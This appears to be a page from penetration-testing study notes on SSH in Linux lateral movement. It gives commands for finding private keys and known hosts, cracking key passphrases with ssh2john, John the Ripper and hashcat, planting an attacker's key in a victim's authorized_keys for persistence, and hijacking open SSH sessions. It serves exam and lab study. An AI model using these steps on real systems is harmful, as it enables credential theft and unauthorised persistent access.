SSH

Public key is stored in the ~/.ssh/authorized_keys file of the server the user is connecting to.

Private key is typically stored in the ~/.ssh/ directory on the system the user is connecting from.

Enumeration

Default: find /home/ -name "id_rsa"

View key to see if it is password protected: cat svuser.key

Check /etc/passwd to see if the key name is a user for the current machine, if not then the key is likely for connecting to other machine.

Then check ~/.ssh/known_hosts to find recently connected machine. Try SSH to any user found on the connected machine with the current session.

Check ~/.bash_history (tail) when the HashKnownHosts setting is enabled in /etc/ssh/ssh_config (that makes known_hosts not useful to read)

Determine IP address of the host name: host {hostname}

Crack private key passphrase

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

cat .hash / the key

$sshng$0$ stands for 3DES
$sshng$1$ stands for RSA, DSA keys using AES-128
$sshng$2$ stands for bcrypt PBKDF + AES-256-CBC / AES-256-CTR
$sshng$3$ stands for EC keys using AES-128
$sshng$4$ stands for RSA, DSA keys using AES-192
$sshng$5$ stands for RSA, DSA keys using AES-256

JtR

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Hashcat

hashcat -m

22911 - RSA/DSA/EC/OpenSSH Private Keys ($0$)
22921 - RSA/DSA/EC/OpenSSH Private Keys ($6$)
22931 - RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)
22941 - RSA/DSA/EC/OpenSSH Private Keys ($4$)
22951 - RSA/DSA/EC/OpenSSH Private Keys ($5$)

-d 2

hashcat -m {229x1} hash /usr/share/wordlists/rockyou.txt

Usage

ssh -i ./svuser.key svuser@hostname

Require private keys to have permissions of 600 before being used to connect to a remote server. chmod 600 user.key

Persistence

persisting ssh login with ssh-keygenOSCP

kali:

ssh-keygen
cat ~/.ssh/id_rsa.pub

victim:

(mkdir /user/.ssh)
echo "{id_rsa.pub}" >> /home/user/.ssh/authorized_keys

# {user} = a user or root where we can write authorized_keys

Most Linux systems require 644 permissions on authorized_keys, which means that only the file owner and root can write to the file.

ssh user@victim

Hijacking

The compromised user needs to have an active SSH connection to the intermediate server. If we've compromised an account with root level access on the intermediate server, we can leverage the victim user's open socket directly. (PDF p.535)

Check ~/.ssh/config, ~/.ssh/controlmaster, SSH if entry exists

Check SSH connections: ps aux | grep ssh

PreviousLinux Lateral Movement NextAnsible

Last updated 9 months ago